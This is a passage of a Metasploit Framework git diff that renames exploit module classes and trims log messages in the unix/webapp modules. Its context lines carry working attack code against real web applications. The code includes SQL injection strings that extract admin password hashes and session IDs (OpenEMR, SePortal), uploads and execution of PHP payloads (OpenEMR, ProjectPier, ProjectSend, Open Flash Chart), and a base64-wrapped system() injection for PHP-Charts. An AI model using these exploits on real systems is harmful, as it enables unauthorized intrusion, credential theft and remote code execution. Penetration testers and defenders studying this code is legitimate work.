normalize_uri(target_uri.path, captures[0]) - print_good("#{peer} - Response parsed successfully") + print_good("Response parsed successfully") - print_status("#{peer} - Executing the payload at #{payload_url}") + print_status("Executing the payload at #{payload_url}") register_files_for_cleanup(File.basename(URI.parse(payload_url).path)) send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5) end diff --git a/modules/exploits/unix/webapp/mambo_cache_lite.rb b/modules/exploits/unix/webapp/mambo_cache_lite.rb index ad270f3590..a3d237047f 100644 --- a/modules/exploits/unix/webapp/mambo_cache_lite.rb +++ b/modules/exploits/unix/webapp/mambo_cache_lite.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/mitel_awc_exec.rb b/modules/exploits/unix/webapp/mitel_awc_exec.rb index 8179ffc36a..943f3d32ac 100644 --- a/modules/exploits/unix/webapp/mitel_awc_exec.rb +++ b/modules/exploits/unix/webapp/mitel_awc_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/moinmoin_twikidraw.rb b/modules/exploits/unix/webapp/moinmoin_twikidraw.rb index 1f0f109a81..1a558a3e0d 100644 --- a/modules/exploits/unix/webapp/moinmoin_twikidraw.rb +++ b/modules/exploits/unix/webapp/moinmoin_twikidraw.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/mybb_backdoor.rb b/modules/exploits/unix/webapp/mybb_backdoor.rb index 3f92aa03d9..084d6f44b9 100644 --- a/modules/exploits/unix/webapp/mybb_backdoor.rb +++ b/modules/exploits/unix/webapp/mybb_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/nagios3_history_cgi.rb b/modules/exploits/unix/webapp/nagios3_history_cgi.rb index 3f0ec69676..9329442d45 100644 --- a/modules/exploits/unix/webapp/nagios3_history_cgi.rb +++ b/modules/exploits/unix/webapp/nagios3_history_cgi.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb b/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb index dde396f3d6..75bd25e80d 100644 --- a/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb +++ b/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/nagios_graph_explorer.rb b/modules/exploits/unix/webapp/nagios_graph_explorer.rb index 44a9e6123d..3f39baba91 100644 --- a/modules/exploits/unix/webapp/nagios_graph_explorer.rb +++ b/modules/exploits/unix/webapp/nagios_graph_explorer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/narcissus_backend_exec.rb b/modules/exploits/unix/webapp/narcissus_backend_exec.rb index f5fdb49389..6a18933811 100644 --- a/modules/exploits/unix/webapp/narcissus_backend_exec.rb +++ b/modules/exploits/unix/webapp/narcissus_backend_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -83,20 +83,20 @@ class Metasploit3 < Msf::Exploit::Remote def check sig = rand_text_alpha(rand(10) + 5) #The string to check - vprint_status("#{peer} - Looking for signature '#{sig}'...") + vprint_status("Looking for signature '#{sig}'...") res = remote_exe("echo #{sig}") if res and res.body =~ /#{sig}/ - vprint_status("#{peer} - Signature '#{sig}' found.") + vprint_status("Signature '#{sig}' found.") return Exploit::CheckCode::Vulnerable else - vprint_status("#{peer} - Signature not found") + vprint_status("Signature not found") return Exploit::CheckCode::Safe end end def exploit - print_status("#{peer} - Sending malicious request...") + print_status("Sending malicious request...") remote_exe(payload.encoded) end diff --git a/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb b/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb index f8b6b04ba6..2a83f31155 100644 --- a/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb +++ b/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient @@ -77,18 +77,18 @@ class Metasploit3 < Msf::Exploit::Remote # Check for ofc_upload_image.php # def check - print_status("#{peer} - Sending check") + print_status("Sending check") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "ofc_upload_image.php"), }) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown elsif res.code.to_i == 404 - vprint_error("#{peer} - No ofc_upload_image.php found") + vprint_error("No ofc_upload_image.php found") elsif res and res.code == 200 and res.body =~ /Saving your image to/ - vprint_status("#{peer} - Found ofc_upload_image.php") + vprint_status("Found ofc_upload_image.php") return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote # Upload @fname = "#{rand_text_alphanumeric(rand(10)+6)}.php" - print_status("#{peer} - Uploading '#{@fname}' (#{payload.encoded.length} bytes)...") + print_status("Uploading '#{@fname}' (#{payload.encoded.length} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'ofc_upload_image.php'), @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote elsif res.body =~ /Saving your image to: (.+)#{@fname}/ path = $1 register_files_for_cleanup(@fname) - print_status("#{peer} - Executing '#{path}#{@fname}'") + print_status("Executing '#{path}#{@fname}'") else fail_with(Failure::NotVulnerable, "#{peer} - File wasn't uploaded, aborting!") end diff --git a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb index 5672d926bd..3b0a3a3eb1 100644 --- a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb +++ b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect installed version") + print_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version < "4.1.2" return Exploit::CheckCode::Appears @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote end def login(base, name, pass) - #print_status("#{peer} - Logging in as non-admin user [ #{datastore['USER']} ]") + #print_status("Logging in as non-admin user [ #{datastore['USER']} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("#{base}", "interface", "main", "main_screen.php"), @@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote sqli << "FROM users WHERE username = 0x61646d696e LIMIT 0,1),0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '#{sqlq}'='#{sqlq}" post_data = "form_pubpid=#{sqli}" - print_status("#{peer} - Retrieving admin password hash through SQLi") + print_status("Retrieving admin password hash through SQLi") res = send_request_cgi({ 'method' => 'POST', 'data' => post_data, @@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /#{sqlq}([a-zA-Z0-9]+)#{sqlq}/ adminhash = $1 - print_status("#{peer} - Admin password hash is [ #{adminhash} ]") + print_status("Admin password hash is [ #{adminhash} ]") else fail_with(Failure::Unknown, "#{peer} - Retrieving admin password failed!") end @@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote file = post_data.to_s file.strip! - print_status("#{peer} - Uploading shell [ #{payload_name} ]") + print_status("Uploading shell [ #{payload_name} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "interface", "super", "manage_site_files.php"), @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup(payload_name) - print_status("#{peer} - Requesting shell [ #{uri}/sites/default/images/#{payload_name} ]") + print_status("Requesting shell [ #{uri}/sites/default/images/#{payload_name} ]") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "sites", "default", "images", "#{payload_name}") @@ -173,7 +173,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, exploit probably failed!") + print_error("Unexpected response, exploit probably failed!") end end diff --git a/modules/exploits/unix/webapp/openemr_upload_exec.rb b/modules/exploits/unix/webapp/openemr_upload_exec.rb index 6a25429929..cd9dac9f8b 100644 --- a/modules/exploits/unix/webapp/openemr_upload_exec.rb +++ b/modules/exploits/unix/webapp/openemr_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" # Check version - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -69,14 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version > "4.1.1" return Exploit::CheckCode::Safe end # Check for vulnerable component - vprint_status("#{peer} - Trying to detect the vulnerable component") + vprint_status("Trying to detect the vulnerable component") res = send_request_cgi({ 'method' => 'GET', @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_name = rand_text_alpha(rand(10) + 5) + '.php' my_payload = payload.encoded - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_raw({ 'method' => 'POST', 'uri' => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php") + "?name=#{payload_name}", @@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup(payload_name) - print_status("#{peer} - Executing PHP payload (#{payload_name})") + print_status("Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_error("#{peer} - Server returned #{res.code.to_s}") + print_error("Server returned #{res.code.to_s}") end end diff --git a/modules/exploits/unix/webapp/opensis_modname_exec.rb b/modules/exploits/unix/webapp/opensis_modname_exec.rb index 9e01b897dc..1c7a6a73b5 100644 --- a/modules/exploits/unix/webapp/opensis_modname_exec.rb +++ b/modules/exploits/unix/webapp/opensis_modname_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote # def login(user, pass) @cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};" - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "index.php"), @@ -81,10 +81,10 @@ class Metasploit3 < Msf::Exploit::Remote }.to_a.shuffle] }) if res and res.code == 200 and res.body =~ /Portal\.php/ - print_good("#{peer} - Authenticated as user '#{user}'") + print_good("Authenticated as user '#{user}'") return true else - print_error("#{peer} - Authenticating as user '#{user}' failed") + print_error("Authenticating as user '#{user}' failed") return false end end @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote def execute_command(cmd, opts = { :php_function => 'system' } ) code = Rex::Text.uri_encode(Rex::Text.encode_base64(cmd+"&")) junk = rand_text_alphanumeric(rand(10)+6) - print_status("#{peer} - Sending payload (#{code.length} bytes)") + print_status("Sending payload (#{code.length} bytes)") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'ajax.php'), @@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote def check return Exploit::CheckCode::Unknown unless login(datastore['USERNAME'], datastore['PASSWORD']) fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10) - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") res = execute_command("echo #{fingerprint}") if res and res.body =~ /align=center>#{fingerprint}/ return Exploit::CheckCode::Vulnerable @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote ].sample res = execute_command(payload.encoded, { :php_function => php_function }) if res and res.code == 200 and res.body =~ /hacking_log/i - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") end diff --git a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb index d271d446fa..01606273b0 100644 --- a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb +++ b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/openx_banner_edit.rb b/modules/exploits/unix/webapp/openx_banner_edit.rb index d76318ede7..c6a695a8d5 100644 --- a/modules/exploits/unix/webapp/openx_banner_edit.rb +++ b/modules/exploits/unix/webapp/openx_banner_edit.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb index c9afc417e0..6efb784256 100644 --- a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb +++ b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/oscommerce_filemanager.rb b/modules/exploits/unix/webapp/oscommerce_filemanager.rb index 51d6d0c8f9..b3e1bf3bbd 100644 --- a/modules/exploits/unix/webapp/oscommerce_filemanager.rb +++ b/modules/exploits/unix/webapp/oscommerce_filemanager.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/pajax_remote_exec.rb b/modules/exploits/unix/webapp/pajax_remote_exec.rb index d53edeb6e2..711533e4f3 100644 --- a/modules/exploits/unix/webapp/pajax_remote_exec.rb +++ b/modules/exploits/unix/webapp/pajax_remote_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/php_charts_exec.rb b/modules/exploits/unix/webapp/php_charts_exec.rb index 722f946e36..b33f1a45bc 100644 --- a/modules/exploits/unix/webapp/php_charts_exec.rb +++ b/modules/exploits/unix/webapp/php_charts_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote rand_key_value = rand_text_alphanumeric(rand(10)+6) # send check - print_status("#{peer} - Sending check") + print_status("Sending check") begin res = send_request_cgi({ 'method' => 'GET', @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Vulnerable end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -96,14 +96,14 @@ class Metasploit3 < Msf::Exploit::Remote rand_key_value = rand_text_alphanumeric(rand(10)+6) # send payload - print_status("#{peer} - Sending payload (#{code.length} bytes)") + print_status("Sending payload (#{code.length} bytes)") begin res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}" }) if res and res.code == 500 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") end diff --git a/modules/exploits/unix/webapp/php_eval.rb b/modules/exploits/unix/webapp/php_eval.rb index 4c57758421..07671c52e1 100644 --- a/modules/exploits/unix/webapp/php_eval.rb +++ b/modules/exploits/unix/webapp/php_eval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/php_include.rb b/modules/exploits/unix/webapp/php_include.rb index 960c8387dd..5ce9472bb2 100644 --- a/modules/exploits/unix/webapp/php_include.rb +++ b/modules/exploits/unix/webapp/php_include.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/php_vbulletin_template.rb b/modules/exploits/unix/webapp/php_vbulletin_template.rb index c8edda9b97..70a7a5713e 100644 --- a/modules/exploits/unix/webapp/php_vbulletin_template.rb +++ b/modules/exploits/unix/webapp/php_vbulletin_template.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body) if b return b.captures[0] - elsif datastore['HTTP::chunked'] == true + elsif datastore['HTTP::chunked'] b = /chunked Transfer-Encoding forbidden/.match(res.body) if b fail_with(Failure::Unknown, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.') diff --git a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb index 996a060a4b..fedf43dcfc 100644 --- a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb +++ b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body) if b return b.captures[0] - elsif datastore['HTTP::chunked'] == true + elsif datastore['HTTP::chunked'] b = /chunked Transfer-Encoding forbidden/.match(res.body) if b fail_with(Failure::BadConfig, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.') diff --git a/modules/exploits/unix/webapp/phpbb_highlight.rb b/modules/exploits/unix/webapp/phpbb_highlight.rb index 009305625b..92159e9983 100644 --- a/modules/exploits/unix/webapp/phpbb_highlight.rb +++ b/modules/exploits/unix/webapp/phpbb_highlight.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb index 9775cd9fb0..2505a8901e 100644 --- a/modules/exploits/unix/webapp/phpmyadmin_config.rb +++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/projectpier_upload_exec.rb b/modules/exploits/unix/webapp/projectpier_upload_exec.rb index 402c9a0d33..6149f0a6cf 100644 --- a/modules/exploits/unix/webapp/projectpier_upload_exec.rb +++ b/modules/exploits/unix/webapp/projectpier_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => "#{base}/tools#{uri}"}) if res and res.code == 404 - print_error("#{peer} - The upload most likely failed") + print_error("The upload most likely failed") return end @@ -123,15 +123,15 @@ class Metasploit3 < Msf::Exploit::Remote p = get_write_exec_payload(:unlink_self=>true) - print_status("#{peer} - Uploading PHP payload (#{p.length.to_s} bytes)...") + print_status("Uploading PHP payload (#{p.length.to_s} bytes)...") res = upload_php(base, php_fname, p, folder_name) if not res - print_error("#{peer} - No response from server") + print_error("No response from server") return end - print_status("#{peer} - Executing '#{php_fname}'...") + print_status("Executing '#{php_fname}'...") exec_php(base, res) end end diff --git a/modules/exploits/unix/webapp/projectsend_upload_exec.rb b/modules/exploits/unix/webapp/projectsend_upload_exec.rb index d61721a33b..0600c02ad9 100644 --- a/modules/exploits/unix/webapp/projectsend_upload_exec.rb +++ b/modules/exploits/unix/webapp/projectsend_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -59,19 +59,19 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, 'process-upload.php') ) if !res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown elsif res.code.to_i == 404 - vprint_error("#{peer} - No process-upload.php found") + vprint_error("No process-upload.php found") return Exploit::CheckCode::Safe elsif res.code.to_i == 500 - vprint_error("#{peer} - Unable to write file") + vprint_error("Unable to write file") return Exploit::CheckCode::Safe elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/ - vprint_error("#{peer} - File process-upload.php is not executable") + vprint_error("File process-upload.php is not executable") return Exploit::CheckCode::Safe elsif res.code.to_i == 200 && res.body && res.body =~ /sys\.config\.php/ - vprint_error("#{peer} - Software is misconfigured") + vprint_error("Software is misconfigured") return Exploit::CheckCode::Safe elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/ # response on revision 118 onwards includes the file name @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote elsif res.body && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/ return Exploit::CheckCode::Appears elsif res.body && res.body =~ /Failed to open output stream/ - vprint_error("#{peer} - Upload folder is not writable") + vprint_error("Upload folder is not writable") return Exploit::CheckCode::Safe else return Exploit::CheckCode::Detected @@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote data = Rex::MIME::Message.new data.add_part(php, 'application/octet-stream', nil, %(form-data; name="file"; filename="#{fname}")) post_data = data.to_s - print_status("#{peer} - Uploading file '#{fname}' (#{php.length} bytes)") + print_status("Uploading file '#{fname}' (#{php.length} bytes)") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "process-upload.php?name=#{fname}"), @@ -121,14 +121,14 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, "#{peer} - Software is misconfigured") # response on revision 118 onwards includes the file name elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/ - print_good("#{peer} - Payload uploaded successfully (#{fname})") + print_good("Payload uploaded successfully (#{fname})") return fname # response on revisions 100 to 117 does not include the file name elsif res.code.to_i == 200 && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/ - print_warning("#{peer} - File upload may have failed") + print_warning("File upload may have failed") return fname else - vprint_status("#{peer} - Received response: #{res.code} - #{res.body}") + vprint_status("Received response: #{res.code} - #{res.body}") fail_with(Failure::Unknown, "#{peer} - Something went wrong") end end @@ -137,18 +137,18 @@ class Metasploit3 < Msf::Exploit::Remote # Execute uploaded file # def exec(upload_path) - print_status("#{peer} - Executing #{upload_path}...") + print_status("Executing #{upload_path}...") res = send_request_raw( { 'uri' => normalize_uri(target_uri.path, upload_path) }, 5 ) if !res - print_status("#{peer} - Request timed out while executing") + print_status("Request timed out while executing") elsif res.code.to_i == 404 - vprint_error("#{peer} - Not found: #{upload_path}") + vprint_error("Not found: #{upload_path}") elsif res.code.to_i == 200 - vprint_good("#{peer} - Executed #{upload_path}") + vprint_good("Executed #{upload_path}") else - print_error("#{peer} - Unexpected reply") + print_error("Unexpected reply") end end diff --git a/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb b/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb index 5e43183164..90cab50a10 100644 --- a/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb +++ b/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/redmine_scm_exec.rb b/modules/exploits/unix/webapp/redmine_scm_exec.rb index 113f7cc419..fa917c7e4e 100644 --- a/modules/exploits/unix/webapp/redmine_scm_exec.rb +++ b/modules/exploits/unix/webapp/redmine_scm_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/seportal_sqli_exec.rb b/modules/exploits/unix/webapp/seportal_sqli_exec.rb index d5385a3fd3..f71b7fd44c 100644 --- a/modules/exploits/unix/webapp/seportal_sqli_exec.rb +++ b/modules/exploits/unix/webapp/seportal_sqli_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version.to_f <= 2.5 return Exploit::CheckCode::Appears @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - print_status("#{peer} - Logging in as user [ #{datastore['USER']} ]") + print_status("Logging in as user [ #{datastore['USER']} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "login.php"), @@ -94,8 +94,8 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 302 and res.get_cookies =~ /sessionid=([a-zA-Z0-9]+)/ session = $1 - print_status("#{peer} - Login successful") - print_status("#{peer} - Session cookie is [ #{session} ]") + print_status("Login successful") + print_status("Session cookie is [ #{session} ]") else fail_with(Failure::Unknown, "#{peer} - Login was not succesful!") end @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote sqli << "FROM seportal_sessions WHERE session_user_id=1 LIMIT 1" sqli << "),0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '0x#{sqls}'='0x#{sqls}" - print_status("#{peer} - Retrieving admin session through SQLi") + print_status("Retrieving admin session through SQLi") res = send_request_cgi({ 'method' => 'POST', 